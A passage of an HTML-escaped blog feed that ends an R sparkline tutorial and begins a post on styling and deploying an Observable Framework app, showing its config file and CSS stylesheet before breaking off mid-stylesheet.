&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bullet2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;), type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bullet&amp;#34;&lt;/span&gt;, rangeColors &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;lightgrey&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;slategrey&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="Sparkline bullet graph" width="22%" height="120" src="html_files/bullet2.html" frameBorder="0" scrolling="no"&gt;&lt;/iframe&gt;
&lt;p&gt;See you in the next blog post, which covers embedding sparklines in HTML tables.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/sparkline/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Porting a Shiny App to Observable Framework: Part 2</title><link>https://www.jumpingrivers.com/blog/shiny-to-observable2/</link><pubDate>Thu, 30 Jan 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-to-observable2/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-to-observable2/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-to-observable2/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
details {
margin-top: 0.5em;
}
summary {
cursor: pointer;
}
details .highlight {
margin-top: 0.5em;
}
details pre {
margin-bottom: 0.2em;
}
main aside {
padding: 0.25rem 1rem;
background-color: var(--cream);
border-radius: 10px;
}
ol li {
margin-bottom: 0.25rem;
}
.switch {
color: var(--off-white);
background-color: var(--burgundy);
padding: 0.2em 0.5em;
}
code.switch {
display: block;
margin: 0.5em 0;
width: fit-content;
}
.highlight {
resize: horizontal;
overflow: auto;
}
.resizable .highlight {
resize: both;
height: 250px;
}
.blog-content picture img {
margin-top: 1rem;
}
.blog-content picture ~ p {
margin-top: 0;
}
&lt;/style&gt;
&lt;h2 id="preamble"&gt;Preamble&lt;/h2&gt;
&lt;p&gt;This post, Part 2 in a series of two, looks at styling and deploying the Observable Framework app we built in &lt;a href="https://www.jumpingrivers.com/blog/shiny-to-observable/"&gt;Part 1&lt;/a&gt;. Code blocks with burgundy backgrounds refer to specific tagged commits in the &lt;a href="https://github.com/jumpingrivers/observable-framework-movie-explorer/tree/main" rel="external"&gt;accompanying GitHub repository&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Join us for the next installment of our Shiny in Production conference! For more details, check out our
&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;conference website!&lt;/a&gt;
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="styling-the-app-with-css"&gt;Styling the App with CSS&lt;/h2&gt;
&lt;p&gt;We can add a stylesheet by referencing it through the &amp;ldquo;style&amp;rdquo; property in the configuration file, &lt;code&gt;observablehq.config.js&lt;/code&gt;. That config file can be used to define various attributes for our project, including what title and favicon should be displayed in the browser tab, where the root of the source code is (&lt;code&gt;root: &amp;quot;src&amp;quot;&lt;/code&gt;) and where, relative to that root, the stylesheet is stored (&lt;code&gt;style: &amp;quot;style/style.css&amp;quot;&lt;/code&gt;).&lt;/p&gt;
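&lt;p&gt;As a rough sketch, a configuration file with the properties described above might look something like the following. The &lt;code&gt;root&lt;/code&gt; and &lt;code&gt;style&lt;/code&gt; values are the ones quoted above; the title is a hypothetical placeholder, and the favicon setting is left out here rather than guessed at, so this may not match the file in the repository.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;// Illustrative sketch only; not necessarily the repository&amp;#39;s actual config
export default {
  // Hypothetical title, shown in the browser tab
  title: &amp;#34;Movie explorer&amp;#34;,
  // Root of the source code
  root: &amp;#34;src&amp;#34;,
  // Stylesheet location, relative to the root above
  style: &amp;#34;style/style.css&amp;#34;
};
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Because the stylesheet path is resolved relative to the root, the file itself lives at src/style/style.css.&lt;/p&gt;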
&lt;p&gt;You can go crazy here with your CSS or keep it simple. Since this is just meant as a quick demonstration we&amp;rsquo;ll do the latter: we&amp;rsquo;ll tweak the appearance of controls, add Jumping Rivers fonts and colours and rearrange the layout for wider screens:&lt;/p&gt;
&lt;details open&gt;&lt;summary&gt;src/style/style.css&lt;/summary&gt;
&lt;div class="resizable"&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-CSS" data-lang="CSS"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;@&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#7ee787"&gt;url&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://fonts.googleapis.com/css2?family=Outfit:wght@100..900&amp;amp;display=swap&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;body&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;font-family&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Outfit&amp;#34;&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;sans-serif&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;position&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;relative&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;color&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;#0c293d&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;background-color&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;#fcfbfa&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;display&lt;/span&gt;: &lt;span style="color:#ff7b72"&gt;grid&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;justify-content&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;center&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;align-items&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;center&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;column-gap&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;em&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;grid-template-columns&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;350&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;500&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;grid-template-areas&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;title title&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;controls chart&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;controls count&amp;#34;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#7ee787"&gt;h1&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;font-weight&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;600&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;grid-area&lt;/span&gt;: title;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;text-align&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;center&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#7ee787"&gt;div&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;display&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;none&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#7ee787"&gt;div&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;has&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#7ee787"&gt;form&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;display&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;unset&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;grid-area&lt;/span&gt;: controls;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;padding-top&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;em&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#7ee787"&gt;div&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;has&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#7ee787"&gt;figure&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;display&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;flex&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;justify-content&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;center&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;grid-area&lt;/span&gt;: chart;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#7ee787"&gt;p&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;grid-area&lt;/span&gt;: count;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;text-align&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;center&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;input&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;type&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;number&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;text-align&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;right&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; &lt;span style="color:#7ee787"&gt;form&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;class&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;^=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;inputs&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;has&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#7ee787"&gt;input&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;type&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;number&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;])&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;display&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;inline-flex&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;flex-direction&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;column&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;width&lt;/span&gt;: calc(&lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;%&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;em&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;margin-right&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;em&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;margin-bottom&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;em&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; &lt;span style="color:#7ee787"&gt;form&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;class&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;^=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;inputs&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;has&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#7ee787"&gt;input&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;type&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;number&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;])&lt;/span&gt; &lt;span style="color:#7ee787"&gt;label&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;width&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;%&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; &lt;span style="color:#7ee787"&gt;form&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;class&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;^=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;inputs&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;has&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#7ee787"&gt;select&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#7ee787"&gt;input&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;type&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;range&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;],&lt;/span&gt; &lt;span style="color:#7ee787"&gt;input&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;type&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;],&lt;/span&gt; &lt;span style="color:#7ee787"&gt;input&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;type&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;radio&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;])&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;display&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;flex&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;width&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;%&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;flex-direction&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;column&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;margin-bottom&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;em&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; &lt;span style="color:#7ee787"&gt;form&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;class&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;^=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;inputs&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;has&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#7ee787"&gt;select&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#7ee787"&gt;input&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;type&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;range&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;],&lt;/span&gt; &lt;span style="color:#7ee787"&gt;input&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;type&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;],&lt;/span&gt; &lt;span style="color:#7ee787"&gt;input&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;type&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;radio&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;])&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;width&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;%&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;aria-label&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;tip&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;fill-opacity&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;0.8&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;aria-label&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;tip&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt; &lt;span style="color:#7ee787"&gt;text&lt;/span&gt; &lt;span style="color:#7ee787"&gt;tspan&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;first-child&lt;/span&gt; {
